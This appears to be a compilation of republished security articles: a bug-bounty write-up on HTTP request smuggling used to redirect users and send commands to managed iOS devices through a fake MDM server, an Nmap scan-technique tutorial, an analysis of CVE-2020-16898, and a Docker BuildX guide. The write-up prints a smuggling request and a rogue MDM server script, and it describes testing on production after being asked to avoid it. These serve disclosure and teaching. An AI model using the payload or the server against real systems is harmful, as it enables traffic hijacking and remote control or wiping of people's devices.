The request was pointed at one of the 13 subdomains. Since I cannot reveal anything regarding the company, let’s say the requests were actually made to https://vulnerable.requestsmuggling.com. Instead of using vulnerable.requestsmuggling.com in the Host headers, I changed it to www.example.com in order to get a redirect in the response pointing to it.
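A sketch of what that request can look like, assuming a CL.TE desync (this is an illustration, not the exact payload; the lengths must match the smuggled bytes):

POST / HTTP/1.1
Host: vulnerable.requestsmuggling.com
Content-Length: 55
Transfer-Encoding: chunked

0

GET /getfile HTTP/1.1
Host: www.example.com
X: x

The back-end builds the Location of its redirect from the smuggled Host header, which is how the poisoned response ends up pointing at https://www.example.com/getfile/.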

Playing the attacker with the request above, the unlucky next user making any request to https://vulnerable.requestsmuggling.com would receive the response generated by my malicious request.


Without knowing what was happening, and completely transparently, the next user would be magically redirected to https://www.example.com/getfile/. If I kept sending the same request described above, I’d be able to redirect almost all of the users to a domain that I control.

After being able to demonstrate the Universal Redirect above, I found 4 more subdomains (17 subdomains in total) identified as vulnerable by Smuggler and included them in the same report. At that time I didn’t look closely at these 4 new subdomains. The Hackerone triager accepted my report and downgraded the severity from critical (9.1) to high (7.5), which the company later changed back from high (7.5) to critical. 🤷‍♂️

As soon as my report was validated, I asked for permission to try other scenarios which could affect real users, and got the answer below from the Hackerone triager.

I passed your report to the company team, please don't perform any activity that might affect live users before hearing back from the team.

HTTP Request Smuggling is really powerful, and if you don’t know what you are doing, you can impact all the users. I just continued with my investigation to see what other impact I could prove with all those instances.

The First Bounty 💰

Four days after the date I opened the report, someone from the company commented on the report asking for more details on how to reproduce the issue for a specific subdomain, and to avoid testing on production subdomains as much as possible. From the subdomain names it was easy to identify which subdomains were production and which were not.

After providing all the details on how to reproduce the Universal Redirect for one subdomain, I was rewarded with a US$2,000 bounty. In order to increase the bounty, I checked all the subdomains, and from those 17 subdomains I was able to demonstrate the Universal Redirect on only 7.

I didn’t agree with the bounty, because I knew that with those 7 vulnerable subdomains I could cause a big impact on their business by just redirecting all the users to a malicious domain. I complained through the comments and got the comment below from the company.

The bounty payment was based on the number of unique systems affected and the maximum perceived impact of the vulnerability (redirection).

That is fair enough, so I decided to take a closer look at the other 10 subdomains to see what I could get from them.

Trying Harder ⚔️

I tried for a few days to get some impact out of those 10 subdomains but got nothing. I kept trying harder because some of the subdomain names had api in the middle. If I could redirect the traffic from those APIs to another domain under my control, maybe I could get some sensitive information.

After trying everything, I decided to go back to the other 7 subdomains to check if I was missing something, and the subdomain mdm.qa-vulnerable.requestsmuggling.com caught my attention.

A few months back I had some experience working with a Mobile Device Management (MDM) solution, and I knew a little bit about the MDM protocol, so I decided to investigate the subdomain mdm.qa-vulnerable.requestsmuggling.com in more detail. I was really comfortable working on this subdomain, since the name clearly said this was a QA environment.

The first step was to redirect a random request to Burp Collaborator, to see if I could capture a request from a random user and analyze it. I created my payload, sent the request and waited.


After a few seconds I was able to see the request arrive in my Burp Collaborator.


Judging by the request headers “Content-Type: application/x-apple-aspen-mdm”, “Mdm-Signature: …” and “User-Agent: MDM/1.0”, we can assume this request came from an MDM client. A quick Google search returned the Mobile Device Management Protocol Reference document as the first hit.


After enrollment, the devices start listening for a push notification from the server. To cause the device to poll the MDM server for commands, the MDM server sends a notification through the APNS gateway to the device. The message sent with the push notification is JSON-formatted and must contain the PushMagic string as the value of the mdm key.

Since I didn’t have the mdm key, and I wasn’t sure we could send a notification through the APNS gateway to the device, I checked what happens next. The device responds to this push notification by contacting the MDM server using HTTP PUT over TLS (SSL), which matches our Burp Collaborator request. This message may contain an Idle status or may contain the result of a previous operation. I thought the requests I was seeing on Burp Collaborator were Idle statuses: it was Sunday, so I didn’t think anyone was sending commands to devices in a QA environment.

From the documentation we can see that MDM clients follow HTTP 3xx redirections without user interaction, and in the case of mdm.qa-vulnerable.requestsmuggling.com there is no client certificate authentication, since we can see the Mdm-Signature header in the request.

If your MDM server is behind an HTTPS proxy that does not convey client certificates, MDM provides a way to tunnel the client identity in an additional HTTP header. If the value of the SignMessage field in the MDM payload is set to true, each message coming from the device carries an additional HTTP header named Mdm-Signature.


My attack scenario was based on the way the MDM protocol works. From the documentation we can see that after executing one command, a device will wait for the server to finish the process or to send more commands.


In theory, I could inject a redirection to replace the server response that is supposed to finish the process, redirecting the device to a fake MDM server which would send another command instead. To do that, I took the install-application example from the document, which sends a command to install an application on the device.


As you can see from the documentation, the user needs to accept the request in order to install the application. Since the attack is kind of blind, I created a test Python server hosted at https://myattackerdomain.com with the example above, and added the ManifestURL parameter pointing to Burp Collaborator to see if I’d receive any feedback, which unfortunately didn’t happen.

After running my fake server for a few minutes and performing the attack with the redirection pointing to https://myattackerdomain.com/api, I was able to see just a few requests coming to my server. I’m not sure these requests were coming from real MDM devices, and since it was a QA environment, I didn’t think there was much traffic from devices to the server.


I was afraid of violating their policy, so I decided to stop and sent all the information above to the company, and after that I got the answer below.

If you are able to prove that the vulnerability can be used for more than redirection, like gaining access to sensitive information, we can re-evaluate the reward.

No Retreat! No Surrender! 🥋

I decided to give it a try on production, since I wasn’t seeing much traffic on any other server. I did the same attack as before, but now on mdm.prod-vulnerable.requestsmuggling.com, and I got responses from the devices to valid server commands.

I also made a small improvement to my server to print the requests and reply with a response for the “ProfileList” command, using this documentation as an example.
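Such a server can be very small. A minimal sketch of a fake MDM endpoint in Python 3 (standard library only; the CommandUUID is made up, and the TLS termination that MDM requires is omitted here):

import plistlib
from http.server import BaseHTTPRequestHandler, HTTPServer

COMMAND = {
    "CommandUUID": "11111111-2222-3333-4444-555555555555",  # hypothetical
    "Command": {"RequestType": "ProfileList"},
}

class FakeMDM(BaseHTTPRequestHandler):
    def do_PUT(self):
        # Print whatever the device sends: an Idle status or a command result.
        length = int(self.headers.get("Content-Length", 0))
        print(self.rfile.read(length).decode(errors="replace"))
        # Reply with a plist-encoded ProfileList command.
        body = plistlib.dumps(COMMAND)
        self.send_response(200)
        self.send_header("Content-Type", "application/xml")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

HTTPServer(("0.0.0.0", 8443), FakeMDM).serve_forever()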


In order to prove that I could execute MDM commands, I took a valid CommandUUID from one of the outputs, changed one letter to be sure it would be a unique CommandUUID, and performed the same attack again.

By repeating the same attack, I got another request (which is the command response to the server) with exactly the same CommandUUID from my payload, proving that I was able to execute the ProfileList MDM command on any client.

At this point there was nothing else to attack, so I included everything in my report and started pressing F5, waiting for the response below.

Alright! I think this proves your point much better. Based on the impact even just testing can have on active devices, please stop testing this while we investigate further.

After that, the company asked a few questions about the attack, and one thing I highlighted to them was the clients following the redirects. RFC 2616 states that the data should be re-sent to the redirect URL, but that the user agent MUST NOT automatically redirect the request unless it can be confirmed by the user.

In the MDM context it would be impracticable for a user to accept every possible redirect, which is why the MDM documentation describes the 301 redirect as automatically followed but not remembered. I still have no idea why the clients need to blindly follow the redirects.


After some days when everything was confirmed as fixed I was rewarded with the maximum payout US$15,000 bounty and a US$50 bonus. In total I got US$17,050 for this report. 🤑

The company was really nice and also told me they created a lab to test the same attack, but using the EraseDevice command. Below you can read their own comments about the results.

A few seconds later, we hear on the call the iPad had rebooted and was showing a progress bar. About a minute later, the iPad rebooted again and showed the default iOS setup screen. A complete device wipe!

Bonus Track 🏆

After receiving the bounty, I asked the company if I could publish this post, of course without mentioning their name or anything related to their company. They replied saying to wait for a few days, because some vendors were involved and they wanted to check if other customers could have the same problem.

It took more than a few days, but finally I got the answer below.

Good news! Citrix has released their security bulletin and have credited you in it, as well as in their hall of fame!
Bulletin - https://support.citrix.com/article/CTX281474
Hall of Fame - https://www.citrix.com/about/trust-center/vulnerability-process.html
You should be all set to go ahead and publish your report.

Unfortunately, Citrix doesn’t have a bug bounty program, but at least I was recognized in their portal.

If you have any question or want to share any interesting technique about HTTP Request Smuggling please send email to ricardo.iramar@gmail.com or contact me on twitter @ricardo_iramar.

Deep Dive Into Nmap Scan Techniques

Deep Dive Into Nmap Scan Techniques

Original text by PenTest-duck

Disclaimer: I won’t be covering “every” scan type (e.g. -sY, -sM), but I’ll cover the scan types that I think will be used more often.
A More Serious Disclaimer: using Nmap against a target or network without explicit permission is illegal and should therefore not be attempted.

Introduction

nmap -h SCAN TECHNIQUES output

So if you’re like me and have run man nmap or nmap -h to see what Nmap has to offer, you’ll notice it prints lines and lines of output. In this blog post, I’ll try to demystify many of the scan techniques it has to offer, including some uncommon ones that you may never have to use in your life.

TCP Connect Scan (-sT)

Syntax: nmap -sT <target-ip> [-p <ports>]
Let’s kick this off with one of the more common ones. Personally, I rarely ever use -sT unless -sS doesn’t work (but if -sS doesn’t work, I doubt that -sT is going to work, either). Nevertheless, it is good to know how a TCP Connect scan works and how Nmap can leverage TCP to reveal port status. Basically, TCP Connect scans utilise TCP’s connection-oriented nature to attempt to perform a full 3-way TCP handshake with each port and verify its state.
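Under the hood, a connect scan is nothing more than the operating system’s regular connect() call. A minimal Python sketch of the same idea (the target address is a placeholder):

import socket

target = "192.0.2.10"  # placeholder address
for port in (22, 23, 80):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(1)
    # connect_ex returns 0 only if the full 3-way handshake succeeded
    state = "open" if s.connect_ex((target, port)) == 0 else "closed/filtered"
    print(port, state)
    s.close()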

TCP Connect Scan captured in Wireshark (23 = closed, 22 = open)

Nmap sends a SYN packet to initiate the 3-way TCP handshake. If the port is closed (look at top 2 packets), the port replies with a RST-ACK, to terminate the connection.

If the port is open (look at next 5 packets), the server replies with a SYN-ACK, and Nmap completes the 3-way handshake with an ACK packet. Then (after the port updates the window [search “TCP sliding window”]), Nmap immediately terminates the connection with a RST-ACK packet.

Pro: quite reliably scans TCP ports
Cons: less “stealthy” (connection attempts will be logged by the server), takes a longer time, sends more packets

TCP SYN (“Stealth”/“Half-Open”) Scan (-sS)

Syntax: nmap [-sS] <target-ip> [-p <ports>]
The SYN scan is the default scan of Nmap, and it goes by many names, the first referring to its sneaky nature of keeping connection attempts from being logged by the server (nowadays, the SYN scan is not so stealthy anymore). But how does it achieve this? The second name explains it — “Half Open” refers to the SYN scan’s method of performing only 2 steps of the 3-way TCP handshake. We never send the third and last packet, and instead terminate the connection, therefore allowing Nmap to verify the port’s status without fully connecting to the port.

TCP SYN Scan captured in Wireshark (23 = closed, 22 = open)

Just like the TCP Connect scan, Nmap sends a SYN packet to initiate the handshake, and if the port is closed, receives a RST-ACK (packets 1, 3).

However, this time, if the port is open, after Nmap receives the SYN-ACK, it immediately sends a RST packet to terminate the connection, as it has verified that the port is open due to it responding with a SYN-ACK (packets 4, 5).

Pros: quicker and sends less packets
Con: with advancements in firewall and server defenses technology, it is not stealthy anymore

UDP Scan (-sU)

Syntax: nmap -sU <target-ip> [-p <ports>]
UDP Scanning utilises UDP and ICMP packets to discover the status of a port. Nmap sends an empty UDP packet and either receives no reply or an ICMP Port Unreachable packet. But due to UDP’s connectionless nature, the output can be unreliable at times.

UDP Scan captured with Wireshark (88 = open, 89 = closed)

Nmap sends an empty UDP packet to both ports (packets 1, 2, 4) and receives no reply from port 88 twice (open) and an ICMP Port Unreachable packet (packet 3) from port 89 (closed).

But Nmap returns this output:

Nmap returns “open|filtered”

What’s up with the “open|filtered” instead of “open”?
Here’s the thing: when Nmap received no reply from port 88, one scenario could be that port 88 really is open and is therefore not responding with any reply. However, another possible scenario is that a firewall is filtering out our traffic, so the UDP packet never reaches the target and we receive no reply. Either way, we can’t tell the difference — which results in Nmap displaying “open|filtered”.

Pros: allows the scanning of UDP ports
Cons: not always reliable

Null, FIN & Xmas Scans (-sN, -sF, -sX)

Syntax: nmap {-sN -sF -sX} <target-ip> [-p <ports>]
Now we get to the scan techniques that we will come across much less often. All of Null, FIN and Xmas scans are intended to stealthily sneak through stateless firewalls and packet filters by turning on different TCP flags (a packet-crafting sketch follows this list):
Null scan: no flags set
FIN scan: FIN flag set
Xmas scan: FIN, PSH, URG flags set (packet lights up like a Christmas tree, hence the name)
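A minimal scapy sketch of the Xmas probe, assuming scapy is installed and you have root privileges to send raw packets (the address is a placeholder):

from scapy.all import IP, TCP, sr1

# flags="FPU" sets FIN, PSH and URG; per RFC 793, a closed port answers
# with RST-ACK, while an open port stays silent (hence "open|filtered").
ans = sr1(IP(dst="192.0.2.10")/TCP(dport=22, flags="FPU"), timeout=2)
if ans is None:
    print("open|filtered")
elif ans.haslayer(TCP) and ans[TCP].flags.R:
    print("closed")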

Null, FIN and Xmas scan captured in Wireshark (22 = open, 23 = closed)

For all of the scans, the underlying procedure is the same, except for the flags. If a port is closed, it replies with a RST-ACK, and if it is open, it does not reply. However, this is not the case for all machines: not every machine follows RFC 793, and some can send a RST packet even though the port is open. Additionally, since these scans rely on open ports not replying (like the UDP scan), they also suffer from us not knowing whether a firewall has filtered our packets or not (thus the output of “open|filtered”).

Pro: can sneak through some firewalls and packet filters
Cons: not all machines conform to RFC 793, not always reliable

ACK Scan (-sA)

Syntax: nmap -sA <target-ip> [-p <ports>]
Now, the ACK scan is a little bit different to what we’ve looked at so far. The ACK Scan isn’t meant to discover the open/closed status of ports. Instead, it helps us visualise the rulesets of intermediary firewalls. As the name suggests, Nmap sends TCP packets with only the ACK flag set, and if it receives a RST packet (both open and closed ports will respond with a RST), the port is marked as “unfiltered”, but if it receives no reply, or an ICMP error, the port is marked as “filtered”, and the firewall has filtered the packet.

ACK Scan captured in Wireshark (22 = open, 23 = closed)

Port 22 is open, while port 23 is closed, but both reply with a RST packet when an ACK packet is sent. This shows that both ports are not filtered by any firewalls.

Pro: maps out firewall rulesets
Con: cannot determine if the port is open or closed

Idle Scan (-sI)

Syntax: nmap -sI <zombie-ip> <target-ip> [-p <ports>]
This is the most interesting — yet the most complex — scan of all. As you can see from the syntax, we require a “zombie” in order to perform an idle scan. In a nutshell, Nmap will attempt to leverage an idle host to indirectly launch a port scan, therefore hiding our IP address from the target. It does this using the difference in increments of the IP ID of the zombie.

To understand how Nmap achieves this in understandable detail, please look at figures 5.6, 5.7 and 5.8 in https://nmap.org/book/idlescan.html.

Pro: masks our true IP address
Con: possibility of false positives (due to zombie host not being idle)

Further Digging:

If you want to know more about these scan types, and other scan types Nmap has to offer, take a look at:
https://nmap.org/book/man-port-scanning-techniques.html

Exploring the Exploitability of “Bad Neighbor”: The Recent ICMPv6 Vulnerability (CVE-2020-16898)

Exploring the Exploitability of “Bad Neighbor”: The Recent ICMPv6 Vulnerability (CVE-2020-16898)

Original text by FOLLOW ZECOPS

At the Patch Tuesday on October 13, Microsoft published a patch and an advisory for CVE-2020-16898, dubbed “Bad Neighbor”, which was undoubtedly the highlight of the monthly series of patches. The bug has received a lot of attention since it was published as an RCE vulnerability, meaning that with a successful exploitation it could be made wormable. Initially, it was graded with a high CVSS score of 9.8/10, though it was later lowered to 8.8.

In days following the publication, several write-ups and POCs were published. We looked at some of them:

The writeup by pi3 contains details that are not mentioned in the writeup by Quarkslab. It’s important to note that the bug can only be exploited when the source address is a link-local address. That’s a significant limitation, meaning that the bug cannot be exploited over the internet. In any case, both writeups explain the bug in general and then dive into triggering a buffer overflow, causing a system crash, without exploring other options.

We wanted to find out whether something else could be done with this vulnerability, aside from triggering the buffer overflow and causing a blue screen (BSOD).

In this writeup, we’ll share our findings.

The bug in a nutshell

The bug happens in the tcpip!Ipv6pHandleRouterAdvertisement function, which is responsible for handling incoming ICMPv6 packets of the type Router Advertisement (part of the Neighbor Discovery Protocol).

The packet structure is (RFC 4861):
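Per RFC 4861, the Router Advertisement message is laid out as follows:

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Code      |          Checksum             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Cur Hop Limit |M|O|  Reserved |       Router Lifetime         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                         Reachable Time                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                          Retrans Timer                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|   Options ...
+-+-+-+-+-+-+-+-+-+-+-+-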

As can be seen from the packet structure, the packet consists of a 16-bytes header, followed by a variable amount of option structures. Each option structure begins with a type field and a length field, followed by specific fields for the relevant option type.

The bug happens due to an incorrect handling of the Recursive DNS Server Option (type 25, RFC 5006):
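Per RFC 5006, the RDNSS option is laid out as:

 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     Length    |           Reserved            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                           Lifetime                            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                                                               |
:            Addresses of IPv6 Recursive DNS Servers            :
|                                                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+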

The Length field defines the length of the option in units of 8 bytes. The option header size is 8 bytes, and each IPv6 address adds additional 16 bytes to the length. That means that if the structure contains n IPv6 addresses, the length is supposed to be set to 1+2*n. The bug happens when the length is an even number, causing the code to incorrectly interpret the beginning of the next option structure.

Visualizing the POC of 0xeb-bp

As a starting point, let’s visualize 0xeb-bp’s POC and get some intuition about what’s going on and why it causes a stack overflow. Here is the ICMPv6 packet as constructed in the source code:

As you can see, the ICMPv6 packet is followed by two Recursive DNS Server options (type 25), and then a 256-bytes buffer. The two options have an even length of 4, which triggers the bug.

The tcpip!Ipv6pHandleRouterAdvertisement function that parses the packet does two iterations over the option structures. The first iteration does simple checks such as verifying the length field of the structures. The second iteration actually parses the option structures. Because of the bug, each iteration interprets the packet differently.

Here’s how the first iteration sees the packet:

Each option structure is just skipped according to the length field after doing some basic checks.

Here’s how the second iteration sees it:

This time, in the case of a Recursive DNS Server option, the length field is used to determine the amount of IPv6 addresses, which is calculated as follows:

amount_of_addr = (length – 1) / 2

Then, the IPv6 addresses are processed, and the next iteration continues after the last processed IPv6 address, which, in case of an even length value, happens to be in the middle of the option structure compared to what the first iteration sees. This results in processing an option structure which wasn’t validated in the first iteration. 
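To put numbers on the desync, take the even length value 4 from the POC; a tiny sketch of the bookkeeping:

length = 4                                     # even Length field from the POC
first_loop_skip = length * 8                   # first loop skips 32 bytes
addresses = (length - 1) // 2                  # second loop parses 1 address
second_loop_consumed = 8 + 16 * addresses      # 8-byte header + 16 bytes = 24
print(first_loop_skip - second_loop_consumed)  # 8: the two loops diverge by 8 bytes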

Specifically in this POC, 34 is not a valid length for an option of type 24, but because it wasn’t validated, the processing continues and too many bytes are copied onto the stack, causing a stack overflow. Notably, fragmentation is required for triggering the stack overflow (see the Quarkslab writeup for details).

Zooming out

Now we know how to trigger a stack overflow using CVE-2020-16898, but what are the checks that are made in each of the mentioned iterations? What other checks, aside from the length check, can we bypass using this bug? Which option types are supported, and is the handling different for each of them? 

We didn’t find answers to these questions in any writeup, so we checked it ourselves.

Here are the relevant parts of the Ipv6pHandleRouterAdvertisement function, slightly simplified:

if (!IsLinkLocalAddress(SrcAddress) && !IsLoopbackAddress(SrcAddress))
    // error

// Initialization and other code...

NET_BUFFER NetBuffer = /* ... */;

// First loop
while (NetBuffer->DataLength >= 2)
{
    BYTE TempTypeLen[2];
    BYTE* TempTypeLenPtr = NdisGetDataBuffer(NetBuffer, 2, TempTypeLen, 1, 0);
    WORD OptionLenInBytes = TempTypeLenPtr[1] * 8;
    if (OptionLenInBytes == 0 || OptionLenInBytes > NetBuffer->DataLength)
        // error

    BYTE OptionType = TempTypeLenPtr[0];
    switch (OptionType)
    {
    case 1: // Source Link-layer Address
        // ...
        break;

    case 3: // Prefix Information
        if (OptionLenInBytes != 0x20)
            // error

        BYTE TempPrefixInfo[0x20];
        BYTE* TempPrefixInfoPtr = NdisGetDataBuffer(NetBuffer, 0x20, TempPrefixInfo, 1, 0);
        BYTE PrefixInfoPrefixLength = TempPrefixInfoPtr[2];
        if (PrefixInfoPrefixLength > 128)
            // error
        break;

    case 5: // MTU
        // ...
        break;

    case 24: // Route Information Option
        if (OptionLenInBytes > 0x18)
            // error

        BYTE TempRouteInfo[0x18];
        BYTE* TempRouteInfoPtr = NdisGetDataBuffer(NetBuffer, 0x18, TempRouteInfo, 1, 0);
        BYTE RouteInfoPrefixLength = TempRouteInfoPtr[2];
        if (RouteInfoPrefixLength > 128 ||
            (RouteInfoPrefixLength > 64 && OptionLenInBytes < 0x18) ||
            (RouteInfoPrefixLength > 0 && OptionLenInBytes < 0x10))
            // error
        break;

    case 25: // Recursive DNS Server Option
        if (OptionLenInBytes < 0x18)
            // error

        // Added after the patch - this is the fix
        //if ((OptionLenInBytes - 8) % 16 != 0)
        //    // error
        break;

    case 31: // DNS Search List Option
        if (OptionLenInBytes < 0x10)
            // error
        break;
    }

    NetBuffer->DataOffset += OptionLenInBytes;
    NetBuffer->DataLength -= OptionLenInBytes;
    // Other adjustments for NetBuffer...
}

// Rewind NetBuffer and do other stuff...

// Second loop...
while (NetBuffer->DataLength >= 2)
{
    BYTE TempTypeLen[2];
    BYTE* TempTypeLenPtr = NdisGetDataBuffer(NetBuffer, 2, TempTypeLen, 1, 0);
    WORD OptionLenInBytes = TempTypeLenPtr[1] * 8;
    if (OptionLenInBytes == 0 || OptionLenInBytes > NetBuffer->DataLength)
        // error

    BOOL AdvanceBuffer = TRUE;

    BYTE OptionType = TempTypeLenPtr[0];
    switch (OptionType)
    {
    case 3: // Prefix Information
        BYTE TempPrefixInfo[0x20];
        BYTE* TempPrefixInfoPtr = NdisGetDataBuffer(NetBuffer, 0x20, TempPrefixInfo, 1, 0);
        BYTE PrefixInfoPrefixLength = TempPrefixInfoPtr[2];
        // Lots of code. Assumptions:
        // PrefixInfoPrefixLength <= 128
        break;

    case 24: // Route Information Option
        BYTE TempRouteInfo[0x18];
        BYTE* TempRouteInfoPtr = NdisGetDataBuffer(NetBuffer, 0x18, TempRouteInfo, 1, 0);
        BYTE RouteInfoPrefixLength = TempRouteInfoPtr[2];
        // Some code. Assumptions:
        // RouteInfoPrefixLength <= 128
        // Other, less interesting assumptions about RouteInfoPrefixLength
        break;

    case 25: // Recursive DNS Server Option
        Ipv6pUpdateRDNSS(..., NetBuffer, ...);
        AdvanceBuffer = FALSE;
        break;

    case 31: // DNS Search List Option
        Ipv6pUpdateDNSSL(..., NetBuffer, ...);
        AdvanceBuffer = FALSE;
        break;
    }

    if (AdvanceBuffer)
    {
        NetBuffer->DataOffset += OptionLenInBytes;
        NetBuffer->DataLength -= OptionLenInBytes;
        // Other adjustments for NetBuffer...
    }
}

// More code...

}

As can be seen from the code, only 6 option types are supported in the first loop, the others are ignored. In any case, each header is skipped precisely according to the Length field.

Even fewer options, 4, are supported in the second loop. And similarly to the first loop, each header is skipped precisely according to the Length field, but this time with two exceptions: types 24 (the Route Information Option) and 25 (Recursive DNS Server Option) have functions which adjust the network buffer pointers by themselves, creating an opportunity for inconsistencies.

That’s exactly what is happening with this bug – the Ipv6pUpdateRDNSS function doesn’t adjust the network buffer pointers as expected when the length field is even.

Breaking assumptions

Essentially, this bug allows us to break the assumptions made by the second loop that are supposed to be verified in the first loop. The only option types that are relevant are the 4 types which appear in both loops, that’s also why we didn’t include the other 2 in the code of the first loop. One such assumption is the value of the length field, and that’s how the buffer overflow POC works, but let’s revisit them all and see what can be achieved.

  • Option type 3 – Prefix Information
    • The option structure size must be 0x20 bytes. Breaking this assumption is what allows us to trigger the stack overflow, by providing a larger option structure. We can also provide a smaller structure, but that doesn’t have much value in this case.
    • The Prefix Length field value must be at most 128. Breaking this assumption allows us to set the field to an invalid value in the range of 129-255. This can indeed be used to cause an out-of-bounds data write, but in all such cases that we could find, the out-of-bounds write happens on the stack in a location which is overridden later anyway, so causing such out-of-bounds writes has no practical value.

      For example, one such out-of-bounds write happens in tcpip!Ipv6pMakeRouteKey, called by tcpip!IppValidateSetAllRouteParameters.
  • Option type 24 – Route Information Option
    • The option structure size must not be larger than 0x18 bytes. Same implications as for option type 3.
    • The Prefix Length field value must be at most 128. Same implications as for option type 3.
    • The Prefix Length field value must fit the structure option size. That isn’t really interesting since any value in the range 0-128 is handled correctly. The worst thing that could happen here is a small out-of-bounds read.
  • Option type 25 – Recursive DNS Server Option
    • The option structure size must not be smaller than 0x18 bytes. This isn’t interesting, since the size must be at least 8 bytes anyway (the length field is verified to be larger than zero in both loops), and any such structure is handled correctly, even though a size of 8-bytes is not valid according to the specification.
    • The option structure size must be in the form of 8+n*16 bytes. This check was added after fixing CVE-2020-16898.
  • Option type 31 – DNS Search List Option
    • The option structure size must not be smaller than 0x10 bytes. Same implications as for option type 25.

As you can see, there was a slight chance of doing something other than the demonstrated stack overflow by breaking the assumption of the valid prefix length value for option type 3 or 24. Even though it’s literally about smuggling a single bit, sometimes that’s enough. But it looks like this time we weren’t that lucky.

Revisiting the Stack Overflow

Before giving up, we took a closer look at the stack. The POCs that we’ve seen are overriding the stack such that the stack cookie (the __security_cookie value) is overridden, causing a system crash before the function returns.

We checked whether overriding anything on the stack can help achieve code execution before the function returns. That can be a local variable in the “Local variables (2)” space, or any variable in the previous frames that might be referenced inside the function. Unfortunately, we came to the conclusion that all the variables in the “Local variables (2)” space are output buffers that are modified before access, and no data from the previous frames is accessed.

Summary

We conclude with high confidence that CVE-2020-16898 is not exploitable without an additional vulnerability. It is possible that we may have missed something. Any insights / feedback is welcome. Even though we weren’t able to exploit the bug, we enjoyed the research, and we hope that you enjoyed this writeup as well.

Preparation toward running Docker on ARM Mac: Building multi-arch images with Docker BuildX

Preparation toward running Docker on ARM Mac: Building multi-arch images with Docker BuildX

Original text by Akihiro Suda

Today, Apple announced that they will ditch Intel and switch to ARM-based chips. This means that Docker for Mac will only be able to run ARM images natively.

So, Docker will no longer be useful when you want to run the same image on Mac and on x86_64 cloud instances? Nope. Docker will remain useful, as long as the image is built with support for multiple architectures.


If you are still building images only for x86_64, you should switch your images to multi-arch as soon as possible, ahead of the actual release of ARM Mac.

Note: ARM Mac will probably be able to run x86_64 images via an emulator, but the performance penalty will be significant.

Building multi-arch images with Docker BuildX

To build multi-architecture images, you need to use Docker BuildX plugin (docker buildx build ) instead of the well-known docker build command.

If you have already heard about the BuildKit mode (export DOCKER_BUILDKIT=1) of the built-in docker build command, you might be confused now and wondering whether BuildKit was deprecated. No worry, BuildKit is still alive. Actually, Docker BuildX is built on BuildKit technology as well, but significantly enhanced compared to the BuildKit mode of the built-in docker build. Aside from multi-arch builds, Docker BuildX also comes with a lot of innovative features such as distributed builds on Kubernetes clusters. See my previous post for further information.

Docker BuildX is installed by default if you are using Docker for Mac on macOS. If you are using Docker for Linux on your own Linux VM (or baremetal Linux), you might need to install Docker BuildX separately. See https://github.com/docker/buildx#installing for the installation steps on Linux.

The three options for multi-arch build

Docker BuildX provides the three options for building multi-arch images:

  1. QEMU mode (easy, slow)
  2. Cross-compilation mode (difficult, fast)
  3. Remote mode (easy, fast, but needs an extra machine)

The easiest option is to use QEMU mode (Option 1), but it incurs significant performance penalty. So, using cross compilation (Option 2) is recommended if you don’t mind adapting Dockerfiles for cross compilation toolchains. If you already have an ARM machine (doesn’t need to be Mac of course), the third option is probably the best choice for you.

Option 1: QEMU mode (easy, slow)

This mode uses QEMU User Mode Emulation for running ARM toolchains in an x86_64 Linux environment. Or quite the opposite after the actual release of ARM Mac: x86_64 toolchains on ARM.

The QEMU integration is already enabled by default on Docker for Mac. If you are using Docker for Linux, you need to enable the QEMU integration using the linuxkit/binfmt tool:

$ uname -sm
Linux x86_64
$ docker run --rm --privileged linuxkit/binfmt:v0.8
$ ls -1 /proc/sys/fs/binfmt_misc/qemu-*
/proc/sys/fs/binfmt_misc/qemu-aarch64
/proc/sys/fs/binfmt_misc/qemu-arm
/proc/sys/fs/binfmt_misc/qemu-ppc64le
/proc/sys/fs/binfmt_misc/qemu-riscv64
/proc/sys/fs/binfmt_misc/qemu-s390x

Then initialize Docker BuildX as follows. This step is required on Docker for Mac as well as on Docker for Linux.

$ docker buildx create --use --name=qemu
$ docker buildx inspect --bootstrap
...
Nodes:
Name:      qemu0
Endpoint:  unix:///var/run/docker.sock
Status:    running
Platforms: linux/amd64, linux/arm64, linux/riscv64, linux/ppc64le, linux/s390x, linux/386, linux/arm/v7, linux/arm/v6

Make sure the command above shows both linux/amd64 and linux/arm64 as supported platforms.

As an example, let’s try dockerizing a “Hello, world” application (GNU Hello) for these architectures. Here is the Dockerfile:

FROM debian:10 AS build
RUN apt-get update && \
    apt-get install -y curl gcc make
RUN curl https://ftp.gnu.org/gnu/hello/hello-2.10.tar.gz | tar xz
WORKDIR hello-2.10
RUN LDFLAGS=-static \
    ./configure && \
    make && \
    mkdir -p /out && \
    mv hello /out

FROM scratch
COPY --from=build /out/hello /hello
ENTRYPOINT ["/hello"]

This Dockerfile doesn’t need to have anything specific to ARM, because QEMU can cover the architecture differences between x86_64 and ARM.

The image can be built and pushed to a registry using the following command. It took 498 seconds on my MacBookPro 2016.

$ docker buildx build \
    --push -t example.com/hello:latest \
    --platform=linux/amd64,linux/arm64 .
[+] Building 498.0s (17/17) FINISHED

